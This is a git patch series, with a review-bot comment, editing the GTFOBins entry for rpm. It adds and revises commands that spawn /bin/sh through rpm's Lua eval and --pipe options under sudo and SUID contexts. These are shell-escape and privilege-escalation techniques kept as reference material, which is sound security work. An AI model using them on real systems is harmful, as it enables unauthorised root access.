From 565ebae8809c0d53a2b438b72375d9397556f207 Mon Sep 17 00:00:00 2001
From: M4x
Date: Wed, 7 Apr 2021 16:30:36 +0800
Subject: [PATCH 1/3] add `command` for `rpm` and delete unnecessary prefix
---
 _gtfobins/rpm.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index ba8dafe..433fd38 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -2,8 +2,12 @@
 functions:
 shell:
 - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
+ command:
+ - code: |
+ rpm --pipe '/bin/id > /tmp/result'
+ cat /tmp/result
 limited-suid:
- - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
+ - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
 sudo:
 - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
 - description: |
From ecb1840df3f29e0c61ff48a82bebccfb91df5ddf Mon Sep 17 00:00:00 2001
From: M4x
Date: Wed, 7 Apr 2021 17:31:05 +0800
Subject: [PATCH 2/3] add command for rpm and delete unnecessary prefix remove trailing spaces
---
 _gtfobins/rpm.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index 433fd38..133fdb9 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -2,7 +2,7 @@
 functions:
 shell:
 - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
- command:
+ command:
 - code: |
 rpm --pipe '/bin/id > /tmp/result'
 cat /tmp/result
From 9800048833e6cc177b602579f48a7a6d4cb63a47 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Thu, 8 Apr 2021 07:56:49 +0200
Subject: [PATCH 3/3] Upgrade to shell
---
 _gtfobins/rpm.md | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index 133fdb9..d1ae142 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -2,12 +2,9 @@
 functions:
 shell:
 - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
- command:
- - code: |
- rpm --pipe '/bin/id > /tmp/result'
- cat /tmp/result
+ - code: rpm --pipe '/bin/sh 0<&1'
 limited-suid:
- - code: rpm --eval '%{lua:os.execute("/bin/sh")}'
+ - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
 sudo:
 - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
 - description: |
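Review bot: The added `shell` entry `rpm --pipe '/bin/sh 0<&1'` carries no `description`, so a reader cannot tell why the `0<&1` redirection is there; a key such as `description: --pipe feeds rpm's output to the command's stdin, so stdin is re-attached to the terminal.` on that entry would document it. The same hunk also restores the `./rpm` prefix under `limited-suid` that patch 1/3 removed, which the subject "Upgrade to shell" does not mention; either state the reason in the commit message or drop the removal from patch 1/3 so the series does not churn. The `sudo` entry's `description: |` block continues outside the hunk.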